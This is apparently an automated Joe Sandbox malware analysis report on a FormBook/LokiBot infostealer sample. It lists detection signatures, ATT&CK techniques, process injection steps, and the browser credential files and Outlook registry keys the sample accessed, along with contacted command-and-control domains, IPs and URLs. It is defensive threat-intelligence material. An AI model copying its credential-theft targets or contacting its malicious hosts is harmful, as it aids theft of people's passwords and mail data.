            Source: pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000006.00000000.2215612101.00000000014A1000.00000002.00000001.00040000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000006.00000002.3924750252.00000000014A1000.00000002.00000001.00040000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000008.00000002.3925092416.0000000001881000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000006.00000000.2215612101.00000000014A1000.00000002.00000001.00040000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000006.00000002.3924750252.00000000014A1000.00000002.00000001.00040000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000008.00000002.3925092416.0000000001881000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\GJRX21GBj3.exeCode function: 0_2_00007FF6585B1544 cpuid 0_2_00007FF6585B1544
            Source: C:\Users\user\Desktop\GJRX21GBj3.exeCode function: 0_2_00007FF6585B11A0 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF6585B11A0

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 4.2.ngen.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.ngen.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000007.00000002.3923813236.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2294296870.0000000005BA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2293698389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3924270486.0000000003150000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3925169217.0000000002C90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3924150933.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3925057114.0000000002AF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2294356055.0000000005CE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\findstr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\findstr.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 4.2.ngen.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.ngen.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000007.00000002.3923813236.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2294296870.0000000005BA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2293698389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3924270486.0000000003150000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3925169217.0000000002C90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3924150933.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3925057114.0000000002AF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2294356055.0000000005CE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Native API            		1
            DLL Side-Loading            		1
            Access Token Manipulation            		3
            Virtualization/Sandbox Evasion            		1
            OS Credential Dumping            		1
            System Time Discovery            		Remote Services1
            Email Collection            		1
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts612
            Process Injection            		1
            Access Token Manipulation            		LSASS Memory121
            Security Software Discovery            		Remote Desktop Protocol1
            Archive Collected Data            		3
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            Abuse Elevation Control Mechanism            		612
            Process Injection            		Security Account Manager3
            Virtualization/Sandbox Evasion            		SMB/Windows Admin Shares1
            Data from Local System            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
            DLL Side-Loading            		1
            Deobfuscate/Decode Files or Information            		NTDS2
            Process Discovery            		Distributed Component Object ModelInput Capture4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Abuse Elevation Control Mechanism            		LSA Secrets1
            Application Window Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
            Obfuscated Files or Information            		Cached Domain Credentials2
            File and Directory Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            Software Packing            		DCSync114
            System Information Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            DLL Side-Loading            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1467022 Sample: GJRX21GBj3.exe Startdate: 03/07/2024 Architecture: WINDOWS Score: 100 32 www.mg55aa.xyz 2->32 34 www.valerieomage.com 2->34 36 14 other IPs or domains 2->36 44 Snort IDS alert for network traffic 2->44 46 Malicious sample detected (through community Yara rule) 2->46 48 Antivirus detection for URL or domain 2->48 52 3 other signatures 2->52 10 GJRX21GBj3.exe 1 2->10         started        signatures3 50 Performs DNS queries to domains with low reputation 32->50 process4 signatures5 64 Writes to foreign memory regions 10->64 66 Allocates memory in foreign processes 10->66 68 Injects a PE file into a foreign processes 10->68 13 ngen.exe 10->13         started        16 conhost.exe 10->16         started        18 svchost.exe 10->18         started        process6 signatures7 72 Maps a DLL or memory area into another process 13->72 20 pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe 13->20 injected process8 signatures9 54 Found direct / indirect Syscall (likely to bypass EDR) 20->54 23 findstr.exe 13 20->23         started        process10 signatures11 56 Tries to steal Mail credentials (via file / registry access) 23->56 58 Tries to harvest and steal browser information (history, passwords, etc) 23->58 60 Modifies the context of a thread in another process (thread injection) 23->60 62 3 other signatures 23->62 26 pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe 23->26 injected 30 firefox.exe 23->30         started        process12 dnsIp13 38 shops.myshopify.com 23.227.38.74, 49711, 80 CLOUDFLARENETUS Canada 26->38 40 www.lacemalt.top 203.161.55.102, 49726, 49727, 49728 VNPT-AS-VNVNPTCorpVN Malaysia 26->40 42 6 other IPs or domains 26->42 70 Found direct / indirect Syscall (likely to bypass EDR) 26->70 signatures14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            GJRX21GBj3.exe68%ReversingLabsWin64.Trojan.LokiBot

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            http://www.valerieomage.com/c7rq/?k06T=httm3UUwH6NnwSQhbzeVca8kqE5bj6YPstl+OFvVeu4EU857dyc7w4+qhgXRMO7PTzi/X2HMMMtdNC+wv2+smLAouLcyIEijMeq9ccv2ntai0EWGFrkjFC0U/c7k/DTDLA==&rz=LZsl-bkp-XfXeRLp0%Avira URL Cloudsafe
            https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js0%Avira URL Cloudsafe
            https://download.quark.cn/download/quarkpc?platform=android&ch=pcquark0%Avira URL Cloudsafe
            http://www.mg55aa.xyz/7npk/0%Avira URL Cloudsafe
            https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
            http://www.siteblogoficialon.com/xti2/0%Avira URL Cloudsafe
            https://aka.ms/nativeaot-c0%Avira URL Cloudsafe
            https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
            https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js0%Avira URL Cloudsafe
            https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
            https://valerieomage.com/c7rq?k06T=httm3UUwH6NnwSQhbzeVca8kqE5bj6YPstl0%Avira URL Cloudsafe
            http://www.lacemalt.top/tb8p/0%Avira URL Cloudsafe
            http://www.mybodyradar.net/nml2/100%Avira URL Cloudmalware
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
            https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.e96dc6dc6863835f4ad0.js0%Avira URL Cloudsafe
            http://www.lacemalt.top/tb8p/?k06T=qOKUC29yX8oZAlbJDfcpCLzpMPZC9WFwxrZXgt1GanD4ODtcEeVG6I3ogONv/wZG3CcBcKt2BHXhpUQRSUiI6LSlbUKGOe5tpqy+YL001eRQtx2Jgk6C84cNpUHQ9eTwUQ==&rz=LZsl-bkp-XfXeRLp0%Avira URL Cloudsafe
            https://aka.ms/nativeaot-compatibilityy0%Avira URL Cloudsafe
            https://www.kosherphonestore.com/ktbm/?k06T=dCS0byWQIzTRzJnjmD3PHvju9v1sRk6AuoksZ/9OoI4xLWFKRKixtkji0%Avira URL Cloudsafe
            https://track.uc.cn/collect0%Avira URL Cloudsafe
            http://www.kosherphonestore.com/ktbm/0%Avira URL Cloudsafe
            http://www.cwgehkk.store/kwl6/0%Avira URL Cloudsafe
            http://www.lavillitadepapa.com0%Avira URL Cloudsafe
            https://hm.baidu.com/hm.js?0%Avira URL Cloudsafe
            https://www.siteblogoficialon.com/xti2/?k06T=QBz94yBRYCLuyG0lRWVoJ262XBKS6lrDLuuKlraC80%Avira URL Cloudsafe
            https://aka.ms/nativeaot-compatibility0%Avira URL Cloudsafe
            http://www.mg55aa.xyz/7npk/?rz=LZsl-bkp-XfXeRLp&k06T=3lhlChS8FYnXqyMl6DrMwk16pFUOD90SHj/DecBTIjGSaQxy34ZC87B+/wA+Ty9En/TQ2WIUU2NJwAlG0p0MOprHpEJhuLS8Xg3IfDdoqaVi1Ch1kdwH1TvR7mgJgyRVyQ==0%Avira URL Cloudsafe
            https://aka.ms/GlobalizationInvariantMode0%Avira URL Cloudsafe
            http://www.siteblogoficialon.com/xti2/?k06T=QBz94yBRYCLuyG0lRWVoJ262XBKS6lrDLuuKlraC8+h4eo3ZkplyB9kY6zupybd5FXB5boaSfX9kd7InJ4l2/UGXXDPdESA3G681NsEYfip50N0NMaShmTLM2x7hQcZfKg==&rz=LZsl-bkp-XfXeRLp0%Avira URL Cloudsafe
            http://www.lavillitadepapa.com/i1fz/0%Avira URL Cloudsafe
            https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js0%Avira URL Cloudsafe
            http://www.kosherphonestore.com/ktbm/?k06T=dCS0byWQIzTRzJnjmD3PHvju9v1sRk6AuoksZ/9OoI4xLWFKRKixtkjiz3Hv37r9oCCf0bTqtzy4xv37G1SgBfWJK+jN8eMH36uauFGPXBOtm3yBDVUMLLFQh/MQ7JKdaw==&rz=LZsl-bkp-XfXeRLp0%Avira URL Cloudsafe
            http://www.cwgehkk.store/kwl6/?k06T=a60HvCvUhLiFhuUSc8WrKARCzXFsQAvffUZBz2uIU9nHYJX4NGLIPasF9EYqD4O1NmBy69LXG4mImYvzxGn1S/csb+glCs2OenUaXJQynPXKXRJsgC/umNodRP7idNP7JA==&rz=LZsl-bkp-XfXeRLp0%Avira URL Cloudsafe
            https://image.uc.cn/s/uae/g/3o/berg/static/index.c4bc5b38d870fecd8a1f.css0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.lacemalt.top
            		203.161.55.102
            		truefalse
              		unknown
              www.kosherphonestore.com.cdn.hstgr.net
              		84.32.84.130
              		truefalse
                		unknown
                siteblogoficialon.com
                		108.179.193.98
                		truefalse
                  		unknown
                  www.mg55aa.xyz
                  		35.241.34.216
                  		truefalse
                    		unknown
                    www.cwgehkk.store
                    		43.155.26.241
                    		truefalse
                      		unknown
                      shops.myshopify.com
                      		23.227.38.74
                      		truetrue
                        		unknown
                        www.lavillitadepapa.com
                        		74.208.46.171
                        		truefalse
                          		unknown
                          mybodyradar.net
                          		3.33.130.190
                          		truefalse
                            		unknown
                            www.gospelstudygroup.org
                            		unknown
                            		unknowntrue
                              		unknown
                              www.amkmos.online
                              		unknown
                              		unknowntrue
                                		unknown
                                www.mybodyradar.net
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.valerieomage.com
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.instantmailer.cloud
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.kosherphonestore.com
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.mcxright.com
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.siteblogoficialon.com
                                          		unknown
                                          		unknowntrue
                                            		unknown

                                            Contacted URLs

                                            NameMaliciousAntivirus DetectionReputation
                                            http://www.valerieomage.com/c7rq/?k06T=httm3UUwH6NnwSQhbzeVca8kqE5bj6YPstl+OFvVeu4EU857dyc7w4+qhgXRMO7PTzi/X2HMMMtdNC+wv2+smLAouLcyIEijMeq9ccv2ntai0EWGFrkjFC0U/c7k/DTDLA==&rz=LZsl-bkp-XfXeRLptrue
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.mg55aa.xyz/7npk/false
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.siteblogoficialon.com/xti2/false
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.lacemalt.top/tb8p/false
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.kosherphonestore.com/ktbm/false
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.lacemalt.top/tb8p/?k06T=qOKUC29yX8oZAlbJDfcpCLzpMPZC9WFwxrZXgt1GanD4ODtcEeVG6I3ogONv/wZG3CcBcKt2BHXhpUQRSUiI6LSlbUKGOe5tpqy+YL001eRQtx2Jgk6C84cNpUHQ9eTwUQ==&rz=LZsl-bkp-XfXeRLpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.mybodyradar.net/nml2/false
                                            • Avira URL Cloud: malware
                                            		unknown
                                            http://www.cwgehkk.store/kwl6/false
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.mg55aa.xyz/7npk/?rz=LZsl-bkp-XfXeRLp&k06T=3lhlChS8FYnXqyMl6DrMwk16pFUOD90SHj/DecBTIjGSaQxy34ZC87B+/wA+Ty9En/TQ2WIUU2NJwAlG0p0MOprHpEJhuLS8Xg3IfDdoqaVi1Ch1kdwH1TvR7mgJgyRVyQ==false
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.lavillitadepapa.com/i1fz/false
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.siteblogoficialon.com/xti2/?k06T=QBz94yBRYCLuyG0lRWVoJ262XBKS6lrDLuuKlraC8+h4eo3ZkplyB9kY6zupybd5FXB5boaSfX9kd7InJ4l2/UGXXDPdESA3G681NsEYfip50N0NMaShmTLM2x7hQcZfKg==&rz=LZsl-bkp-XfXeRLpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.cwgehkk.store/kwl6/?k06T=a60HvCvUhLiFhuUSc8WrKARCzXFsQAvffUZBz2uIU9nHYJX4NGLIPasF9EYqD4O1NmBy69LXG4mImYvzxGn1S/csb+glCs2OenUaXJQynPXKXRJsgC/umNodRP7idNP7JA==&rz=LZsl-bkp-XfXeRLpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.kosherphonestore.com/ktbm/?k06T=dCS0byWQIzTRzJnjmD3PHvju9v1sRk6AuoksZ/9OoI4xLWFKRKixtkjiz3Hv37r9oCCf0bTqtzy4xv37G1SgBfWJK+jN8eMH36uauFGPXBOtm3yBDVUMLLFQh/MQ7JKdaw==&rz=LZsl-bkp-XfXeRLpfalse
                                            • Avira URL Cloud: safe
                                            		unknown

                                            URLs from Memory and Binaries

                                            NameSourceMaliciousAntivirus DetectionReputation
                                            https://duckduckgo.com/chrome_newtabfindstr.exe, 00000007.00000003.2523816914.0000000008057000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://download.quark.cn/download/quarkpc?platform=android&ch=pcquarkfindstr.exe, 00000007.00000002.3927738841.0000000006600000.00000004.00000800.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3926054651.0000000005018000.00000004.10000000.00040000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000008.00000002.3925534375.0000000004698000.00000004.00000001.00040000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.jsfindstr.exe, 00000007.00000002.3927738841.0000000006600000.00000004.00000800.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3926054651.0000000005018000.00000004.10000000.00040000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000008.00000002.3925534375.0000000004698000.00000004.00000001.00040000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://duckduckgo.com/ac/?q=findstr.exe, 00000007.00000003.2523816914.0000000008057000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.jsfindstr.exe, 00000007.00000002.3927738841.0000000006600000.00000004.00000800.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3926054651.0000000005018000.00000004.10000000.00040000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000008.00000002.3925534375.0000000004698000.00000004.00000001.00040000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://www.google.com/images/branding/product/ico/googleg_lodp.icofindstr.exe, 00000007.00000003.2523816914.0000000008057000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://aka.ms/nativeaot-cGJRX21GBj3.exefalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://valerieomage.com/c7rq?k06T=httm3UUwH6NnwSQhbzeVca8kqE5bj6YPstlfindstr.exe, 00000007.00000002.3926054651.00000000041F6000.00000004.10000000.00040000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000008.00000002.3925534375.0000000003876000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2627811818.0000000028C66000.00000004.80000000.00040000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://aka.ms/nativeaot-compatibilityyGJRX21GBj3.exefalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://track.uc.cn/collectfindstr.exe, 00000007.00000002.3927738841.0000000006600000.00000004.00000800.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3926054651.0000000005018000.00000004.10000000.00040000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000008.00000002.3925534375.0000000004698000.00000004.00000001.00040000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=findstr.exe, 00000007.00000003.2523816914.0000000008057000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://www.kosherphonestore.com/ktbm/?k06T=dCS0byWQIzTRzJnjmD3PHvju9v1sRk6AuoksZ/9OoI4xLWFKRKixtkjifindstr.exe, 00000007.00000002.3926054651.000000000451A000.00000004.10000000.00040000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000008.00000002.3925534375.0000000003B9A000.00000004.00000001.00040000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=findstr.exe, 00000007.00000003.2523816914.0000000008057000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://www.ecosia.org/newtab/findstr.exe, 00000007.00000003.2523816914.0000000008057000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.e96dc6dc6863835f4ad0.jsfindstr.exe, 00000007.00000002.3927738841.0000000006600000.00000004.00000800.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3926054651.0000000005018000.00000004.10000000.00040000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000008.00000002.3925534375.0000000004698000.00000004.00000001.00040000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://ac.ecosia.org/autocomplete?q=findstr.exe, 00000007.00000003.2523816914.0000000008057000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.lavillitadepapa.compMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000008.00000002.3925169217.0000000002CE1000.00000040.80000000.00040000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://www.siteblogoficialon.com/xti2/?k06T=QBz94yBRYCLuyG0lRWVoJ262XBKS6lrDLuuKlraC8findstr.exe, 00000007.00000002.3926054651.0000000004B62000.00000004.10000000.00040000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000008.00000002.3925534375.00000000041E2000.00000004.00000001.00040000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://hm.baidu.com/hm.js?findstr.exe, 00000007.00000002.3927738841.0000000006600000.00000004.00000800.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3926054651.0000000005018000.00000004.10000000.00040000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000008.00000002.3925534375.0000000004698000.00000004.00000001.00040000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://aka.ms/nativeaot-compatibilityGJRX21GBj3.exe, 00000000.00000002.2087349436.00007FF658669000.00000004.00000001.01000000.00000003.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchfindstr.exe, 00000007.00000003.2523816914.0000000008057000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://aka.ms/nativeaot-compatibilityYGJRX21GBj3.exefalse
                                              		unknown
                                              https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.jsfindstr.exe, 00000007.00000002.3927738841.0000000006600000.00000004.00000800.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3926054651.0000000005018000.00000004.10000000.00040000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000008.00000002.3925534375.0000000004698000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://aka.ms/GlobalizationInvariantModeGJRX21GBj3.exefalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=findstr.exe, 00000007.00000003.2523816914.0000000008057000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://image.uc.cn/s/uae/g/3o/berg/static/index.c4bc5b38d870fecd8a1f.cssfindstr.exe, 00000007.00000002.3927738841.0000000006600000.00000004.00000800.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3926054651.0000000005018000.00000004.10000000.00040000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000008.00000002.3925534375.0000000004698000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown

                                              World Map of Contacted IPs

                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs

                                              Public IPs

                                              IPDomainCountryFlagASNASN NameMalicious
                                              43.155.26.241
                                              		www.cwgehkk.storeJapan4249LILLY-ASUSfalse
                                              203.161.55.102
                                              		www.lacemalt.topMalaysia
                                              		45899VNPT-AS-VNVNPTCorpVNfalse
                                              108.179.193.98
                                              		siteblogoficialon.comUnited States
                                              		46606UNIFIEDLAYER-AS-1USfalse
                                              74.208.46.171
                                              		www.lavillitadepapa.comUnited States
                                              		8560ONEANDONE-ASBrauerstrasse48DEfalse
                                              23.227.38.74
                                              		shops.myshopify.comCanada
                                              		13335CLOUDFLARENETUStrue
                                              84.32.84.130
                                              		www.kosherphonestore.com.cdn.hstgr.netLithuania
                                              		33922NTT-LT-ASLTfalse
                                              3.33.130.190
                                              		mybodyradar.netUnited States
                                              		8987AMAZONEXPANSIONGBfalse
                                              35.241.34.216
                                              		www.mg55aa.xyzUnited States
                                              		15169GOOGLEUSfalse

                                              General Information

                                              Joe Sandbox version:40.0.0 Tourmaline
                                              Analysis ID:1467022
                                              Start date and time:2024-07-03 16:37:58 +02:00
                                              Joe Sandbox product:CloudBasic
                                              Overall analysis duration:0h 8m 57s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                              Run name:Run with higher sleep bypass
                                              Number of analysed new started processes analysed:10
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:2
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Sample name:GJRX21GBj3.exe
                                              renamed because original name is a hash value
                                              Original Sample Name:04ca4f891cf5c2c412c58340ec0de521f940f4b36c1b0b7f1aa1fdae080922aa.exe
                                              Detection:MAL
                                              Classification:mal100.troj.spyw.evad.winEXE@10/1@12/8
                                              EGA Information:
                                              • Successful, ratio: 75%
                                              HCA Information:
                                              • Successful, ratio: 68%
                                              • Number of executed functions: 75
                                              • Number of non-executed functions: 299
                                              Cookbook Comments:
